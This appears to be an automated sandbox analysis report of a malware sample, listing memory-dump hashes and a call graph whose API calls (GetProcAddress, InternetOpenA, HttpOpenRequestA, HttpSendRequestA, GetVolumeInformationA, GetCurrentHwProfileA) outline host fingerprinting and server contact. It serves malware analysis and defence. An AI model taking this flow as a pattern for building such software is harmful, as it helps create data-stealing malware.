                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cdb3057fab7833e715c1b897e0ddd6d58b1615f060d80860c5e075a4eb51387
                                                                                                                                                                                                                                                                            • Instruction ID: 8816a2bda362c0b200a8c04dcd50e7b5dce8ce7b79bbf6c15dd76e6ff6b0929c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cdb3057fab7833e715c1b897e0ddd6d58b1615f060d80860c5e075a4eb51387
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F621B771E056189BDB18CF9B9C446DDBBF7ABC9300F04C0BA950DAA329EB300A459F40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d0b6a4a6d9d447b1a7a71ea9cee90715ea84a9802eb38537d44e95558cdba865
                                                                                                                                                                                                                                                                            • Instruction ID: c9543e76007d7ba1fa129358c183119b8be1e4b25890818c95d09d020755e486
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0b6a4a6d9d447b1a7a71ea9cee90715ea84a9802eb38537d44e95558cdba865
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1721ECB1E056548BDB19CF6B9D482D9BBF3AFC9300F04C0AA950DAA369EA7449459B01
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
                                                                                                                                                                                                                                                                            • API String ID: 0-755401861
                                                                                                                                                                                                                                                                            • Opcode ID: a0442df3273bbd394fae9e55f93c30fb9e9f1f452a22e43a3bf6891ed37dc0d6
                                                                                                                                                                                                                                                                            • Instruction ID: 18471ab67c06164b2da002af8c1965ee13b2d6712495ab258fe17f52ae652813
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0442df3273bbd394fae9e55f93c30fb9e9f1f452a22e43a3bf6891ed37dc0d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61518030A402098FCB58DB79C5506AFBAE7BFC8300F64892CC4059B7A9DE75AD4687A1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:4.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:10.2%
Total number of Nodes:2000
Total number of Limit Nodes:41
402360 11 API calls 90630->90631 90632 403c92 90631->90632 90633 402360 11 API calls 90632->90633 90634 403ca8 90633->90634 90635 402360 11 API calls 90634->90635 90636 403cc1 90635->90636 90637 402360 11 API calls 90636->90637 90638 403cd7 90637->90638 90639 402360 11 API calls 90638->90639 90640 403ced 90639->90640 90641 402360 11 API calls 90640->90641 90642 403d03 90641->90642 90643 402360 11 API calls 90642->90643 90644 403d19 90643->90644 90645 402360 11 API calls 90644->90645 90646 403d2f 90645->90646 90647 402360 11 API calls 90646->90647 90648 403d48 90647->90648 90649 402360 11 API calls 90648->90649 90650 403d5e 90649->90650 90651 402360 11 API calls 90650->90651 90652 403d74 90651->90652 90653 402360 11 API calls 90652->90653 90654 403d8a 90653->90654 90655 402360 11 API calls 90654->90655 90656 403da0 90655->90656 90657 402360 11 API calls 90656->90657 90658 403db6 90657->90658 90659 402360 11 API calls 90658->90659 90660 403dcf 90659->90660 90661 402360 11 API calls 90660->90661 90662 403de5 90661->90662 90663 402360 11 API calls 90662->90663 90664 403dfb 90663->90664 90665 402360 11 API calls 90664->90665 90666 403e11 90665->90666 90667 402360 11 API calls 90666->90667 90668 403e27 90667->90668 90669 402360 11 API calls 90668->90669 90670 403e3d 90669->90670 90671 402360 11 API calls 90670->90671 90672 403e56 90671->90672 90673 402360 11 API calls 90672->90673 90674 403e6c 90673->90674 90675 402360 11 API calls 90674->90675 90676 403e82 90675->90676 90677 402360 11 API calls 90676->90677 90678 403e98 90677->90678 90679 402360 11 API calls 90678->90679 90680 403eae 90679->90680 90681 402360 11 API calls 90680->90681 90682 403ec4 90681->90682 90683 402360 11 API calls 90682->90683 90684 403edd 90683->90684 90685 402360 11 API calls 90684->90685 90686 403ef3 90685->90686 90687 402360 11 API calls 90686->90687 90688 403f09 90687->90688 90689 402360 11 API calls 90688->90689 90690 403f1f 90689->90690 90691 402360 11 API calls 90690->90691 90692 403f35 
90691->90692 90693 402360 11 API calls 90692->90693 90694 403f4b 90693->90694 90695 402360 11 API calls 90694->90695 90696 403f64 90695->90696 90697 402360 11 API calls 90696->90697 90698 403f7a 90697->90698 90699 402360 11 API calls 90698->90699 90700 403f90 90699->90700 90701 402360 11 API calls 90700->90701 90702 403fa6 90701->90702 90703 402360 11 API calls 90702->90703 90704 403fbc 90703->90704 90705 402360 11 API calls 90704->90705 90706 403fd2 90705->90706 90707 402360 11 API calls 90706->90707 90708 403feb 90707->90708 90709 402360 11 API calls 90708->90709 90710 404001 90709->90710 90711 402360 11 API calls 90710->90711 90712 404017 90711->90712 90713 402360 11 API calls 90712->90713 90714 40402d 90713->90714 90715 402360 11 API calls 90714->90715 90716 404043 90715->90716 90717 402360 11 API calls 90716->90717 90718 404059 90717->90718 90719 402360 11 API calls 90718->90719 90720 404072 90719->90720 90721 402360 11 API calls 90720->90721 90722 404088 90721->90722 90723 402360 11 API calls 90722->90723 90724 40409e 90723->90724 90725 402360 11 API calls 90724->90725 90726 4040b4 90725->90726 90727 402360 11 API calls 90726->90727 90728 4040ca 90727->90728 90729 402360 11 API calls 90728->90729 90730 4040e0 90729->90730 90731 402360 11 API calls 90730->90731 90732 4040f9 90731->90732 90733 402360 11 API calls 90732->90733 90734 40410f 90733->90734 90735 402360 11 API calls 90734->90735 90736 404125 90735->90736 90737 402360 11 API calls 90736->90737 90738 40413b 90737->90738 90739 402360 11 API calls 90738->90739 90740 404151 90739->90740 90741 402360 11 API calls 90740->90741 90742 404167 90741->90742 90743 402360 11 API calls 90742->90743 90744 404180 90743->90744 90745 402360 11 API calls 90744->90745 90746 404196 90745->90746 90747 402360 11 API calls 90746->90747 90748 4041ac 90747->90748 90749 402360 11 API calls 90748->90749 90750 4041c2 90749->90750 90751 402360 11 API calls 90750->90751 90752 4041d8 90751->90752 90753 402360 11 API calls 
90752->90753 90754 4041ee 90753->90754 90755 402360 11 API calls 90754->90755 90756 404207 90755->90756 90757 402360 11 API calls 90756->90757 90758 40421d 90757->90758 90759 402360 11 API calls 90758->90759 90760 404233 90759->90760 90761 402360 11 API calls 90760->90761 90762 404249 90761->90762 90763 402360 11 API calls 90762->90763 90764 40425f 90763->90764 90765 402360 11 API calls 90764->90765 90766 404275 90765->90766 90767 402360 11 API calls 90766->90767 90768 40428e 90767->90768 90769 402360 11 API calls 90768->90769 90770 4042a4 90769->90770 90771 402360 11 API calls 90770->90771 90772 4042ba 90771->90772 90773 402360 11 API calls 90772->90773 90774 4042d0 90773->90774 90775 402360 11 API calls 90774->90775 90776 4042e6 90775->90776 90777 402360 11 API calls 90776->90777 90778 4042fc 90777->90778 90779 402360 11 API calls 90778->90779 90780 404315 90779->90780 90781 402360 11 API calls 90780->90781 90782 40432b 90781->90782 90783 402360 11 API calls 90782->90783 90784 404341 90783->90784 90785 402360 11 API calls 90784->90785 90786 404357 90785->90786 90787 402360 11 API calls 90786->90787 90788 40436d 90787->90788 90789 402360 11 API calls 90788->90789 90790 404383 90789->90790 90791 402360 11 API calls 90790->90791 90792 40439c 90791->90792 90793 402360 11 API calls 90792->90793 90794 4043b2 90793->90794 90795 402360 11 API calls 90794->90795 90796 4043c8 90795->90796 90797 402360 11 API calls 90796->90797 90798 4043de 90797->90798 90799 402360 11 API calls 90798->90799 90800 4043f4 90799->90800 90801 402360 11 API calls 90800->90801 90802 40440a 90801->90802 90803 402360 11 API calls 90802->90803 90804 404423 90803->90804 90805 4188e0 90804->90805 90806 4188ed 43 API calls 90805->90806 90807 418cfe 9 API calls 90805->90807 90806->90807 90808 418da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90807->90808 90809 418e18 90807->90809 90808->90809 90810 418ee2 90809->90810 90811 418e25 8 API calls 90809->90811 90812 418eeb 
GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90810->90812 90813 418f5f 90810->90813 90811->90810 90812->90813 90814 418ff9 90813->90814 90815 418f6c 6 API calls 90813->90815 90816 419006 9 API calls 90814->90816 90817 4190dc 90814->90817 90815->90814 90816->90817 90818 4190e5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90817->90818 90819 419159 90817->90819 90818->90819 90820 419162 GetProcAddress GetProcAddress 90819->90820 90821 41918d 90819->90821 90820->90821 90822 4191c1 90821->90822 90823 419196 GetProcAddress GetProcAddress 90821->90823 90824 4192b9 90822->90824 90825 4191ce 10 API calls 90822->90825 90823->90822 90826 4192c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90824->90826 90827 41931e 90824->90827 90825->90824 90826->90827 90828 419327 GetProcAddress 90827->90828 90829 41933a 90827->90829 90828->90829 90830 419343 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90829->90830 90831 41939f 90829->90831 90830->90831 90832 417d7d 90831->90832 90833 4193a8 GetProcAddress 90831->90833 90834 401120 90832->90834 90833->90832 90835 40fe60 lstrcpy 90834->90835 90836 401149 90835->90836 90837 40fe60 lstrcpy 90836->90837 90838 40115c 90837->90838 90839 40fe60 lstrcpy 90838->90839 90840 401178 90839->90840 90841 414330 90840->90841 90842 414368 90841->90842 90843 40feb0 2 API calls 90842->90843 90844 414391 90843->90844 90845 40feb0 2 API calls 90844->90845 90846 41439e 90845->90846 90847 40feb0 2 API calls 90846->90847 90848 4143ab 90847->90848 90849 40fe20 lstrcpy 90848->90849 90850 4143b8 90849->90850 90851 40fe20 lstrcpy 90850->90851 90852 4143c9 90851->90852 90853 40fe20 lstrcpy 90852->90853 90854 4143da 90853->90854 90855 40fe20 lstrcpy 90854->90855 90856 4143ee 90855->90856 90857 40fe20 lstrcpy 90856->90857 90858 4143ff 90857->90858 90859 40fe20 lstrcpy 90858->90859 90945 414413 90859->90945 90860 402480 lstrcpy 90860->90945 90862 40fe60 lstrcpy 90862->90945 90863 
414637 StrCmpCA 90863->90945 90864 4024e0 lstrcpy 90864->90945 90865 4146cc StrCmpCA 90866 4152a6 90865->90866 90865->90945 90867 40ff00 lstrcpy 90866->90867 90868 4152b2 90867->90868 91956 4024e0 90868->91956 90871 40ff00 lstrcpy 90873 4152cb 90871->90873 90872 41489f StrCmpCA 90874 415197 90872->90874 90872->90945 91959 402770 lstrcpy 90873->91959 90875 40ff00 lstrcpy 90874->90875 90876 4151a3 90875->90876 91954 402570 lstrcpy 90876->91954 90880 4152df 90883 40ff00 lstrcpy 90880->90883 90881 4151ac 90884 40ff00 lstrcpy 90881->90884 90882 414a8b StrCmpCA 90885 415085 90882->90885 90882->90945 90886 4152ef 90883->90886 90887 4151bc 90884->90887 90888 40ff00 lstrcpy 90885->90888 90892 40fe60 lstrcpy 90886->90892 91955 4027a0 lstrcpy 90887->91955 90891 415094 90888->90891 90889 402570 lstrcpy 90889->90945 90890 4025a0 lstrcpy 90890->90945 91952 402600 lstrcpy 90891->91952 90896 415308 90892->90896 90900 40fe60 lstrcpy 90896->90900 90897 4151d0 90901 40ff00 lstrcpy 90897->90901 90898 41509d 90902 40ff00 lstrcpy 90898->90902 90899 414c5e StrCmpCA 90904 414f70 90899->90904 90899->90945 90905 415318 90900->90905 90906 4151e0 90901->90906 90907 4150ad 90902->90907 90903 402510 lstrcpy 90903->90945 90909 40ff00 lstrcpy 90904->90909 90908 40fe60 lstrcpy 90905->90908 90915 40fe60 lstrcpy 90906->90915 91953 4027d0 lstrcpy 90907->91953 90921 414ee3 90908->90921 90912 414f7c 90909->90912 90910 402600 lstrcpy 90910->90945 90911 413b80 29 API calls 90911->90945 91950 402690 lstrcpy 90912->91950 90913 41480a StrCmpCA 90913->90945 90918 4151f9 90915->90918 90922 40fe60 lstrcpy 90918->90922 90919 4150c1 90923 40ff00 lstrcpy 90919->90923 90920 414f85 90925 40ff00 lstrcpy 90920->90925 90921->90093 90926 415209 90922->90926 90927 4150d1 90923->90927 90924 414e3d StrCmpCA 90928 414e58 90924->90928 90929 414e48 Sleep 90924->90929 90930 414f95 90925->90930 90934 40fe60 lstrcpy 90926->90934 90939 40fe60 lstrcpy 90927->90939 90933 40ff00 lstrcpy 90928->90933 90929->90945 91951 402800 
lstrcpy 90930->91951 90931 402690 lstrcpy 90931->90945 90932 4026c0 lstrcpy 90932->90945 90936 414e67 90933->90936 90934->90921 90935 4149e9 StrCmpCA 90935->90945 91948 402720 lstrcpy 90936->91948 90943 4150ea 90939->90943 90941 413a40 24 API calls 90941->90945 90942 414fac 90946 40ff00 lstrcpy 90942->90946 90948 40fe60 lstrcpy 90943->90948 90944 414e70 90949 40ff00 lstrcpy 90944->90949 90945->90860 90945->90862 90945->90863 90945->90864 90945->90865 90945->90872 90945->90882 90945->90889 90945->90890 90945->90899 90945->90903 90945->90910 90945->90911 90945->90913 90945->90924 90945->90931 90945->90932 90945->90935 90945->90941 90947 402630 lstrcpy 90945->90947 90951 402720 lstrcpy 90945->90951 90954 414bc9 StrCmpCA 90945->90954 90959 401120 lstrcpy 90945->90959 90966 414da8 StrCmpCA 90945->90966 90969 40ff00 lstrcpy 90945->90969 91941 4024b0 90945->91941 91944 402540 lstrcpy 90945->91944 91945 4025d0 lstrcpy 90945->91945 91946 402660 lstrcpy 90945->91946 91947 4026f0 lstrcpy 90945->91947 90955 414fbc 90946->90955 90947->90945 90950 4150fa 90948->90950 90953 414e80 90949->90953 90952 40fe60 lstrcpy 90950->90952 90951->90945 90952->90921 91949 402830 lstrcpy 90953->91949 90954->90945 90956 40fe60 lstrcpy 90955->90956 90958 414fd8 90956->90958 90961 40fe60 lstrcpy 90958->90961 90959->90945 90960 414e97 90962 40ff00 lstrcpy 90960->90962 90963 414fe8 90961->90963 90964 414ea7 90962->90964 90965 40fe60 lstrcpy 90963->90965 90967 40fe60 lstrcpy 90964->90967 90965->90921 90966->90945 90968 414ec3 90967->90968 90970 40fe60 lstrcpy 90968->90970 90969->90945 90971 414ed3 90970->90971 90972 40fe60 lstrcpy 90971->90972 90972->90921 90974 40fe77 90973->90974 90975 40fe8e 90974->90975 90976 40fe86 lstrcpy 90974->90976 90975->90106 90976->90975 90979 40ff9b 90977->90979 90978 40ffc5 90978->90112 90979->90978 90980 40ffb1 lstrcpy lstrcat 90979->90980 90980->90978 90981->90116 90983 40fe20 lstrcpy 90982->90983 90984 40246b 90983->90984 90985 410d30 GetWindowsDirectoryA 
90984->90985 90986 410d72 90985->90986 90987 410d79 GetVolumeInformationA 90985->90987 90986->90987 90988 410db0 90987->90988 90989 410de6 GetProcessHeap HeapAlloc 90988->90989 90990 410e00 90989->90990 90991 410e1c wsprintfA lstrcat 90989->90991 90992 40fe20 lstrcpy 90990->90992 91960 410cd0 GetCurrentHwProfileA 90991->91960 90994 410e0b 90992->90994 90994->90122 90995 410e4f 90996 410e61 lstrlen 90995->90996 90997 410e76 90996->90997 91967 411b50 lstrcpy malloc strncpy 90997->91967 90999 410e80 91000 410e8e lstrcat 90999->91000 91001 410ea2 91000->91001 91002 40fe20 lstrcpy 91001->91002 91003 410eb5 91002->91003 91003->90122 91005 40fe60 lstrcpy 91004->91005 91006 404540 91005->91006 91968 404430 91006->91968 91008 40454c 91009 40fe20 lstrcpy 91008->91009 91010 40456d 91009->91010 91011 40fe20 lstrcpy 91010->91011 91012 404581 91011->91012 91013 40fe20 lstrcpy 91012->91013 91014 404592 91013->91014 91015 40fe20 lstrcpy 91014->91015 91016 4045a3 91015->91016 91017 40fe20 lstrcpy 91016->91017 91018 4045b4 91017->91018 91019 4045c9 InternetOpenA StrCmpCA 91018->91019 91020 4045f4 91019->91020 91021 404b68 InternetCloseHandle 91020->91021 91976 411450 91020->91976 91035 404b7a 91021->91035 91023 40460e 91024 40ff50 2 API calls 91023->91024 91025 404622 91024->91025 91026 40ff00 lstrcpy 91025->91026 91027 40462f 91026->91027 91028 40ffe0 3 API calls 91027->91028 91029 404657 91028->91029 91030 40ff00 lstrcpy 91029->91030 91031 404664 91030->91031 91032 40ffe0 3 API calls 91031->91032 91033 404680 91032->91033 91034 40ff00 lstrcpy 91033->91034 91036 40468d 91034->91036 91035->90126 91037 40ff50 2 API calls 91036->91037 91038 4046a8 91037->91038 91039 40ff00 lstrcpy 91038->91039 91040 4046b5 91039->91040 91041 40ffe0 3 API calls 91040->91041 91042 4046d1 91041->91042 91043 40ff00 lstrcpy 91042->91043 91044 4046de 91043->91044 91045 40ffe0 3 API calls 91044->91045 91046 4046fa 91045->91046 91047 40ff00 lstrcpy 91046->91047 91048 404707 91047->91048 91049 40ffe0 3 API 
calls 91048->91049 91050 404724 91049->91050 91051 40ff50 2 API calls 91050->91051 91052 404737 91051->91052 91053 40ff00 lstrcpy 91052->91053 91054 404744 91053->91054 91055 40475b InternetConnectA 91054->91055 91055->91021 91056 404787 HttpOpenRequestA 91055->91056 91057 4047c5 91056->91057 91058 404b5b InternetCloseHandle 91056->91058 91059 4047e1 91057->91059 91060 4047cb InternetSetOptionA 91057->91060 91058->91021 91061 40ffe0 3 API calls 91059->91061 91060->91059 91062 4047f2 91061->91062 91063 40ff00 lstrcpy 91062->91063 91064 4047ff 91063->91064 91065 40ff50 2 API calls 91064->91065 91066 40481a 91065->91066 91067 40ff00 lstrcpy 91066->91067 91068 404827 91067->91068 91069 40ffe0 3 API calls 91068->91069 91070 404843 91069->91070 91071 40ff00 lstrcpy 91070->91071 91072 404850 91071->91072 91073 40ffe0 3 API calls 91072->91073 91074 40486e 91073->91074 91075 40ff00 lstrcpy 91074->91075 91076 40487b 91075->91076 91077 40ffe0 3 API calls 91076->91077 91078 404897 91077->91078 91079 40ff00 lstrcpy 91078->91079 91080 4048a4 91079->91080 91081 40ffe0 3 API calls 91080->91081 91082 4048c0 91081->91082 91083 40ff00 lstrcpy 91082->91083 91084 4048cd 91083->91084 91085 40ff50 2 API calls 91084->91085 91086 4048e8 91085->91086 91087 40ff00 lstrcpy 91086->91087 91088 4048f5 91087->91088 91089 40ffe0 3 API calls 91088->91089 91090 404911 91089->91090 91091 40ff00 lstrcpy 91090->91091 91092 40491e 91091->91092 91093 40ffe0 3 API calls 91092->91093 91094 40493a 91093->91094 91095 40ff00 lstrcpy 91094->91095 91096 404947 91095->91096 91097 40ff50 2 API calls 91096->91097 91098 404962 91097->91098 91099 40ff00 lstrcpy 91098->91099 91100 40496f 91099->91100 91101 40ffe0 3 API calls 91100->91101 91102 40498b 91101->91102 91103 40ff00 lstrcpy 91102->91103 91104 404998 91103->91104 91105 40ffe0 3 API calls 91104->91105 91106 4049b6 91105->91106 91107 40ff00 lstrcpy 91106->91107 91108 4049c3 91107->91108 91109 40ffe0 3 API calls 91108->91109 91110 4049df 91109->91110 91111 
40ff00 lstrcpy 91110->91111 91112 4049ec 91111->91112 91113 40ffe0 3 API calls 91112->91113 91114 404a08 91113->91114 91115 40ff00 lstrcpy 91114->91115 91116 404a15 91115->91116 91117 40ff50 2 API calls 91116->91117 91118 404a30 91117->91118 91119 40ff00 lstrcpy 91118->91119 91120 404a3d 91119->91120 91121 40fe20 lstrcpy 91120->91121 91122 404a55 91121->91122 91123 40ff50 2 API calls 91122->91123 91124 404a69 91123->91124 91125 40ff50 2 API calls 91124->91125 91126 404a7c 91125->91126 91127 40ff00 lstrcpy 91126->91127 91128 404a89 91127->91128 91129 404aa9 lstrlen 91128->91129 91130 404ab9 91129->91130 91131 404ac2 lstrlen 91130->91131 91982 4100c0 91131->91982 91133 404ad2 HttpSendRequestA InternetReadFile 91134 404af5 91133->91134 91135 404b49 InternetCloseHandle 91133->91135 91134->91135 91139 404afc 91134->91139 91983 40fea0 91135->91983 91137 40ffe0 3 API calls 91137->91139 91138 40ff00 lstrcpy 91138->91139 91139->91137 91139->91138 91140 404b2e InternetReadFile 91139->91140 91140->91134 91140->91135 91987 4100c0 91141->91987 91143 4127d7 StrCmpCA 91144 4127e2 ExitProcess 91143->91144 91145 4127e9 91143->91145 91146 4127f9 strtok_s 91145->91146 91148 41294b 91146->91148 91160 41280a 91146->91160 91147 41292f strtok_s 91147->91148 91147->91160 91148->90128 91149 4128e1 StrCmpCA 91149->91147 91150 412840 StrCmpCA 91150->91147 91150->91160 91151 4128a2 StrCmpCA 91151->91147 91151->91160 91152 412824 StrCmpCA 91152->91147 91152->91160 91153 4128b7 StrCmpCA 91153->91147 91153->91160 91154 4128f7 StrCmpCA 91154->91147 91155 412878 StrCmpCA 91155->91147 91155->91160 91156 41291b StrCmpCA 91156->91147 91157 41285c StrCmpCA 91157->91147 91157->91160 91158 4128cc StrCmpCA 91158->91147 91158->91160 91159 40feb0 2 API calls 91159->91160 91160->91147 91160->91149 91160->91150 91160->91151 91160->91152 91160->91153 91160->91154 91160->91155 91160->91156 91160->91157 91160->91158 91160->91159 91162 40fe60 lstrcpy 91161->91162 91163 405d20 91162->91163 91164 404430 5 API 
calls 91163->91164 91165 405d2c 91164->91165 91166 40fe20 lstrcpy 91165->91166 91167 405d4d 91166->91167 91168 40fe20 lstrcpy 91167->91168 91169 405d61 91168->91169 91170 40fe20 lstrcpy 91169->91170 91171 405d72 91170->91171 91172 40fe20 lstrcpy 91171->91172 91173 405d83 91172->91173 91174 40fe20 lstrcpy 91173->91174 91175 405d94 91174->91175 91176 405da9 InternetOpenA StrCmpCA 91175->91176 91177 405dd4 91176->91177 91178 4064bf InternetCloseHandle 91177->91178 91179 411450 2 API calls 91177->91179 91180 4064d5 91178->91180 91181 405dee 91179->91181 91994 406f50 CryptStringToBinaryA 91180->91994 91182 40ff50 2 API calls 91181->91182 91184 405e02 91182->91184 91186 40ff00 lstrcpy 91184->91186 91185 4064db 91187 40feb0 2 API calls 91185->91187 91202 406509 91185->91202 91190 405e0f 91186->91190 91188 4064ee 91187->91188 91189 40ffe0 3 API calls 91188->91189 91191 4064fd 91189->91191 91193 40ffe0 3 API calls 91190->91193 91192 40ff00 lstrcpy 91191->91192 91192->91202 91194 405e37 91193->91194 91195 40ff00 lstrcpy 91194->91195 91196 405e44 91195->91196 91197 40ffe0 3 API calls 91196->91197 91198 405e60 91197->91198 91199 40ff00 lstrcpy 91198->91199 91200 405e6d 91199->91200 91201 40ff50 2 API calls 91200->91201 91203 405e88 91201->91203 91202->90134 91204 40ff00 lstrcpy 91203->91204 91205 405e95 91204->91205 91206 40ffe0 3 API calls 91205->91206 91207 405eb1 91206->91207 91208 40ff00 lstrcpy 91207->91208 91209 405ebe 91208->91209 91210 40ffe0 3 API calls 91209->91210 91211 405eda 91210->91211 91212 40ff00 lstrcpy 91211->91212 91213 405ee7 91212->91213 91214 40ffe0 3 API calls 91213->91214 91215 405f04 91214->91215 91216 40ff50 2 API calls 91215->91216 91217 405f17 91216->91217 91218 40ff00 lstrcpy 91217->91218 91219 405f24 91218->91219 91220 405f3b InternetConnectA 91219->91220 91221 405f67 HttpOpenRequestA 91220->91221 91222 4064bc 91220->91222 91223 4064b5 InternetCloseHandle 91221->91223 91224 405fa5 91221->91224 91222->91178 91223->91222 91225 405fc1 91224->91225 
91226 405fab InternetSetOptionA 91224->91226 91227 40ffe0 3 API calls 91225->91227 91226->91225 91228 405fd2 91227->91228 91229 40ff00 lstrcpy 91228->91229 91230 405fdf 91229->91230 91231 40ff50 2 API calls 91230->91231 91232 405ffa 91231->91232 91233 40ff00 lstrcpy 91232->91233 91234 406007 91233->91234 91235 40ffe0 3 API calls 91234->91235 91236 406023 91235->91236 91237 40ff00 lstrcpy 91236->91237 91238 406030 91237->91238 91239 40ffe0 3 API calls 91238->91239 91240 40604d 91239->91240 91241 40ff00 lstrcpy 91240->91241 91242 40605a 91241->91242 91243 40ffe0 3 API calls 91242->91243 91244 406078 91243->91244 91245 40ff00 lstrcpy 91244->91245 91246 406085 91245->91246 91247 40ffe0 3 API calls 91246->91247 91248 4060a1 91247->91248 91249 40ff00 lstrcpy 91248->91249 91250 4060ae 91249->91250 91251 40ff50 2 API calls 91250->91251 91252 4060c9 91251->91252 91253 40ff00 lstrcpy 91252->91253 91254 4060d6 91253->91254 91255 40ffe0 3 API calls 91254->91255 91256 4060f2 91255->91256 91257 40ff00 lstrcpy 91256->91257 91258 4060ff 91257->91258 91259 40ffe0 3 API calls 91258->91259 91260 40611b 91259->91260 91261 40ff00 lstrcpy 91260->91261 91262 406128 91261->91262 91263 40ff50 2 API calls 91262->91263 91264 406143 91263->91264 91265 40ff00 lstrcpy 91264->91265 91266 406150 91265->91266 91267 40ffe0 3 API calls 91266->91267 91268 40616c 91267->91268 91269 40ff00 lstrcpy 91268->91269 91270 406179 91269->91270 91271 40ffe0 3 API calls 91270->91271 91272 406196 91271->91272 91273 40ff00 lstrcpy 91272->91273 91274 4061a3 91273->91274 91275 40ffe0 3 API calls 91274->91275 91276 4061bf 91275->91276 91277 40ff00 lstrcpy 91276->91277 91278 4061cc 91277->91278 91279 40ffe0 3 API calls 91278->91279 91280 4061e8 91279->91280 91281 40ff00 lstrcpy 91280->91281 91282 4061f5 91281->91282 91283 402450 lstrcpy 91282->91283 91284 406209 91283->91284 91285 40ff50 2 API calls 91284->91285 91286 40621d 91285->91286 91287 40ff00 lstrcpy 91286->91287 91288 40622a 91287->91288 91289 40ffe0 3 API 
calls 91288->91289 91290 406252 91289->91290 91291 40ff00 lstrcpy 91290->91291 91292 40625f 91291->91292 91293 40ffe0 3 API calls 91292->91293 91294 40627b 91293->91294 91295 40ff00 lstrcpy 91294->91295 91296 406288 91295->91296 91297 40ff50 2 API calls 91296->91297 91298 4062a3 91297->91298 91299 40ff00 lstrcpy 91298->91299 91300 4062b0 91299->91300 91301 40ffe0 3 API calls 91300->91301 91302 4062cc 91301->91302 91303 40ff00 lstrcpy 91302->91303 91304 4062d9 91303->91304 91305 40ffe0 3 API calls 91304->91305 91306 4062f7 91305->91306 91307 40ff00 lstrcpy 91306->91307 91308 406304 91307->91308 91309 40ffe0 3 API calls 91308->91309 91310 406320 91309->91310 91311 40ff00 lstrcpy 91310->91311 91312 40632d 91311->91312 91313 40ffe0 3 API calls 91312->91313 91314 406349 91313->91314 91315 40ff00 lstrcpy 91314->91315 91316 406356 91315->91316 91317 40ff50 2 API calls 91316->91317 91318 406371 91317->91318 91319 40ff00 lstrcpy 91318->91319 91320 40637e 91319->91320 91321 406391 lstrlen 91320->91321 91988 4100c0 91321->91988 91323 4063a2 lstrlen GetProcessHeap HeapAlloc 91989 4100c0 91323->91989 91325 4063c5 lstrlen 91990 4100c0 91325->91990 91327 4063d5 memcpy 91991 4100c0 91327->91991 91329 4063e7 lstrlen 91330 4063f7 91329->91330 91331 406400 lstrlen memcpy 91330->91331 91992 4100c0 91331->91992 91333 40641c lstrlen 91993 4100c0 91333->91993 91335 40642c HttpSendRequestA InternetReadFile 91336 4064a8 InternetCloseHandle 91335->91336 91338 406452 91335->91338 91336->91223 91337 40ffe0 3 API calls 91337->91338 91338->91336 91338->91337 91339 40ff00 lstrcpy 91338->91339 91340 40648d InternetReadFile 91338->91340 91339->91338 91340->91336 91340->91338 91999 4100c0 91341->91999 91343 41218f strtok_s 91344 4121f9 91343->91344 91345 41219c 91343->91345 91344->90136 91346 4121e2 strtok_s 91345->91346 91347 40feb0 2 API calls 91345->91347 91348 40feb0 2 API calls 91345->91348 91346->91344 91346->91345 91347->91346 91348->91345 92000 4100c0 91349->92000 91351 411fdf strtok_s 
